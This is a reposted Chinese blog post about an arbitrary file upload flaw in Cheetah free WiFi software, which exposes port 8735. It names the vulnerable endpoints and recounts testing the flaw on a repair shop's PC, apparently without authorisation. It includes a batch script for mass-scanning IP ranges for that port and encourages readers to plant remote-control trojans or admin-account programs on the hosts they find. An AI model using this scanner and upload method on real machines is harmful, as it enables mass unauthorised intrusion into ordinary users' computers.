漏洞详情:
当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。
http://电脑的IP:8735/tool/#upload
http://电脑的IP/api/replypic 存在漏洞导致任意文件上传
漏洞危害:
默认装C盘 可以实现挂马,指定***,拓展大企业内网监控pc机等。
昨天去电脑维修店修电脑。发现他的电脑开的猎豹WIFI ,我就做了个简单的测试。
前几天在乌云看到某大神说的漏洞就试了一下,如图:
就这样简单:我做出了一个简单的猜想可以更多的***更多的电脑:
用3389端口扫描器更改扫描端口为8735 源代码为:
@echo off
color a
@del s.txt /q
@title 全黑8735端口扫描 by:全黑哥 QQ19894287
if not exist "IPs.txt" goto 1111
goto 11ss
:1111
echo 192.168.0.1 192.168.0.255(输入前先把现在这行文字删掉,请保留版权 by:全黑哥 19894287)>IPs.txt
call IPs.txt
:SSYY
cls
:11ss
for /f "eol= tokens=1,2 delims= " %%i in (IPs.txt) do s SYN %%i %%j 8735 /save
@del Result.txt /p
整理一下你们当地纯真IP,然后在服务器上面扫一下 出来的8735端口的99%都是在用猎豹免费WIFI的用户
然后连接上传你的***远控也好 是提权开启管理帐号的程序也罢
最后衷心希望各位大大多多的关注
转载于:https://blog.51cto.com/0daysec/1579659